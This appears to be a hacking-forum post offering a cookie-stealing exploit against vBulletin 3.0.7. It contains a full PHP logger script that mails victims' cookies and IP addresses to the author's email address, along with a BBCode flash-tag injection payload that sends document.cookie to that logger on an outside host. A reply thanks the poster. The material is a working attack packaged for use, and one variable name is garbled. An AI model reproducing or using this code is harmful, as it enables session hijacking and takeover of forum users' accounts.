Vbulletin 3.0.7 exploit Cookies stealer

[Gonzalez]

Creat a file log.php and insert the code:

<?php

/* S4aLog v1.0 [ Beta ]

-----------------------

**Beta Of S4aLog v1.0 With Str_Repalce <;>

! You Can Get Cookies And Refresh The Broweser ! v0.10

[ New New New ]

!Named Your Attack With $nm e.x [url]http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies[/url]
[ MSG ]

Name : Attack1

Cookies : Cookies

Refresh : [url]http://www.s4a.xx[/url]
[ MSG ]!

!

Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;

!

[ New New New ]

*/

$YourMail = "devil-00@hotmail.co.uk";  // Your E-mail

/*-----------------------*/

$Ip = $REMOTE_ADDR;

$Cooki_e = $_GET['id'];

$NameOfAttack = $_GET['nm'];

$Refresh = $_GET['re'];

/* Start */

$ReplaceCookie1 = array("=",";");

$ReplaceCookie2 = array("[ "," ]  ");

$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki    _e); // Replace

/* e.x hash=0210; | hash[0210]*/

//***************************************//

$Hdr = "From: S4aLog <log-v1@s4a.cc>";

$Msg =

"

Mr Attacker  ,,, S4aLog v1 Beta <<

[ ".$NameOfAttack." ] ,, Name Of Attack

[ ".$Refresh." ] ,, Refresh Page

[ ".$Ip." ] ,, Ip

[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ]

[ [mail]devil-00@hotmail.co.uk[/mail] - [mail]devil.00@gmail.com[/mail] ]

-----------------------------------------------

Cookie ::

".$Cooki_e."

";

/* ------------------------------------------------------------------------- */

$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);

/**************************************************      ***************************/

if($Send){

if($Refresh <> ""){header("location:".$Refresh);}

}

?>

And in the forum copy this code in your message:

[flash=http://www.site.com/flash.swf]onmouseover='location.href="http://www.site.com/log.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document.Cookie'[/flash]

[mohandko]

good thanx man